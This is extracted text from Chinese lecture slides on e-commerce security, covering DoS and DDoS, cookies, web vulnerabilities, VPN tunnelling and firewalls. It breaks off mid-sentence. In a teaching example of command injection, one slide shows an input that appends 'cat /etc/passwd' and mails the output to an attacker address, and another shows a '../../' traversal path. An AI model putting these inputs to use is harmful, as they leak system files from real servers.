当前一些常见的网络软件和网络服务存在着安全漏洞，其中有一种软件漏洞是由于协议本身的缺陷造成的。例如TCP序列号的预测问题：a)当客户希望发起一个连接时,他首先发送一个它自己生成的序列号；b)服务器将用该序号和自己生成的序列号响应客户；c)客户再利用服务器的响应序列号进行第二次响应。如果攻击者能够按照一定规则预测出客户的下一个序列号，则他就可以在会话过程中假冒该客户。9/7/2023149第3章电子商务安全技术拒绝服务

当一个授权实体不能获得对网络资源的访问或者当服务器长时间内不能正常地提供服务时，就发生了拒绝服务。拒绝服务的原因：网络部件的物理损坏网络协议本身缺陷洪水攻击：攻击者通过向目标主机发送大量的数据以消耗网络带宽或系统资源，从而使得目标主机超过负荷而无法提供正常的网络服务。9/7/2023150第3章电子商务安全技术Smurf攻击者假冒受害者以广播模式发送ping包所有主机都对受害者进行响应受害者接收到整个网络的响应9/7/2023151第3章电子商务安全技术分布式拒绝服务攻击（DDoS）1攻击者在傀儡机上安装后门程序或植入特洛伊木马3傀儡机同时攻击目标主机2傀儡机接收到攻击信号9/7/2023152第3章电子商务安全技术破坏消息的机密性和完整性

消息机密性面临的威胁：通过窃听或假冒等手段截取在网络上传输的信息，然后通过对这些信息的分析来推断出数据特征。消息的完整性面临的威胁：攻击者可能会通过以下方式来篡改消息：修改消息内容、替换一条消息、重放一条旧消息、改变消息来源或目标、删除消息等。9/7/2023153第3章电子商务安全技术cookieCookie是一些数据文件，可以保存浏览器允许的与客户相关的信息，可用于：记录用户访问轨迹、机器名称、日期等。在某些应用环境中，cookie还可以被看作是用户的代表。为服务器提供用户访问某个Web应用的上下文。Cookie占用你的磁盘空间，保存着与你有关但你不能看到等信息，并能传递给服务器而你不知道。Cookie存在着安全隐患。9/7/2023154第3章电子商务安全技术网站漏洞的威胁目录遍历应用代码错误:交易状态的上下文问题植入外部命令利用SSI是调用外部命令的另外一种有效途径。跨网站脚本执行漏洞恶意移动代码9/7/2023155第3章电子商务安全技术目录遍历避免攻击者通过目录遍历从用户的当前工作区域进入到系统区域。myfiletmpusrsyssysfile../....当前工作区域利用目录遍历访问../../sys/sysfile9/7/2023156第3章电子商务安全技术应用代码错误：交易状态的上下文1浏览可以通过Cookie和改写URL保存和跟踪一个还未完成事务的当前状态。9/7/2023157第3章电子商务安全技术应用代码错误：植入外部命令植入外部命令也是由于“不完全输入验证”程序漏洞造成的。开发者在程序开发过程中考虑到安全问题。假如一个脚本包含了下面的语句：system(“mail$input”)1)用户输入的参数值为user@2)用户输入为：

user@;cat/etc/passwd|mailattacker@9/7/2023158第3章电子商务安全技术应用代码错误：SSI服务器端嵌入(ServerSideInclude，SSI)是一种基于服务器的网页制作技术，它实质上就是指示服务器在当前文档中嵌入指定文件的指令。服务器端嵌入指令将由服务器解释执行，并且服务器将指令的输出作为HTML文件的一部分。SSI代码在客户端是不可见的，客户端只能看到它执行的效果。比如exec指令类似于上文例子中的system功能。9/7/2023159第3章电子商务安全技术应用代码错误：跨网站脚本执行漏洞1提交给包含了HTML代码的参数：如留言html文件3写入2浏览恶意脚本可以插入到html文件攻击者受害者9/7/2023160第3章电子商务安全技术恶意移动代码

移动代码通常是指动态可下载的可执行内容，其中可执行内容实际上是任何可以执行的数据，移动代码的例子包括ActiveX控件和JavaScript。攻击者也可以利用这种技术使得目标主机感染病毒。防止恶意移动代码攻击的方法：代码签名：验证的仅仅只是源代码，但无法验证这些代码本身的正确性或安全性。代码在运行时必须要受到限制和监控。9/7/2023161第3章电子商务安全技术安全执行applet的必要条件系统必须控制applet对重要资源的访问，如文件系统、处理器等。

编程语言可以通过阻止缓冲区溢出保护内存。系统可以通过清除内存数据来阻止对象的重用；并可以回收不再使用的变量所占用的内存。系统应该控制applet之间的通信，以及控制applet通过系统调用影响Java系统外的环境。9/7/2023162第3章电子商务安全技术3.4.2虚拟专用网络

虚拟专用网络(VPN)是指在公共网络中建立一个专用网络，数据通过建立的虚拟安全通道在公共网络中传播。它具有的特点：虚拟的网络具备了公共网和专用网的特点：不安全的公共数据网络上向用户提供安全的专用网络。一种廉价而又安全可靠的通信方法：帮组企业与远程用户、分支机构或商业伙伴建立安全的连接9/7/2023163第3章电子商务安全技术隧道技术

数据包数据包数据报头封装目的地数据包数据包数据报头解封目的地隧道我们将重新封装的数据包在公共网络上传递时所经过的逻辑路径称为隧道。9/7/2023164第3章电子商务安全技术网络隧道协议第二层的隧道协议，工作于数据链路层，如点到点隧道协议（PPTP）、第2层转发协议（L2F）、第2层隧道协议（L2TP）。L2TP利用了两类消息：控制消息：可用于隧道的建立、维护和清除；数据消息：可用于封装PPP帧以便它能在隧道中进行传输。第三层隧道协议，工作于网络层，如IPSec定义了一种标准方法来处理加密的数据。介于第二层和第三层之间的隧道协议。如MPLS隧道协议9/7/2023165第3章电子商务安全技术加密技术

加密技术可以在协议栈的任意层进行：在链路层进行可以保护两台主机之间传输的消息，但目前还没有统一的加密标准。在网络层进行可以使得两个进程之间传输的消息以加密的数据形式通过整个网络。而在网络层中的加密标准是IPSec。某些VPN设备采用了L2TP和IPSec相结合的技术，即它们采用L2TP作为隧道协议，而采用IPSec协议来保护数据。

9/7/2023166第3章电子商务安全技术隧道的建立隧道的建立有两种方式：客户发起方式（Client－Initiated）：隧道一般是由用户或客户端计算机主动请求创建的。客户透明方式（Client－Transparent）：隧道不是由用户发起的而是由支持VPN的设备请求创建的。隧道一旦建立，数据就可以通过隧道发送。9/7/2023167第3章电子商务安全技术VPN工作原理

VPN服务器VPN服务器数据包数据包隧道封装后数据包9/7/2023168第3章电子商务安全技术VPN应用领域

远程访问虚拟网（AccessVPN）：远程用户可以通过公网远程拨号等方式与企业内部网络的VPN设备建立起隧道，实现访问连接。企业内部虚拟网（IntranetVPN）。一个组织机构的总部与其跨地域的分支机构可以采用VPN技术构建组织内部的虚拟专用网。

企业扩展虚拟网（ExtranetVPN）。具有共同利益的组织或合作伙伴可以通过VPN技术构建虚拟专用网，从而实现内联网的网络资源和外部特定网络资源的相互共享。9/7/2023169第3章电子商务安全技术3.4.3防火墙

防火墙是一种用来保护本地系统或网络的设备，以防止网络攻击破坏系统或网络。通常位于被保护的网络和外部网络的边界。根据防火墙所采用的技术，防火墙可以分为：包过滤型防火墙应用代理型防火墙9/7/2023170第3章电子商务安全技术包过滤型防火墙

数据包过滤技术就是根据每个数据包头内的标志来确定是否允许该数据包通过防火墙，其中过滤的依据是系统内设置的过滤规则。远程网络1（拒绝访问）远程网络2（接收访问）包过滤型防火墙HTTPTelnet9/7/2023171第3章电子商务安全技术包过滤防火墙特点一种最为简单的防火墙,网络性能和透明性好。需要管理人员设置相当详细的过滤规则。随着过滤规则数目的增大，不仅增加了出错的概率，而且系统的性能也会受到极大影响。包过滤防火墙不能根据数据包的数据部分进行过滤处理，无法识别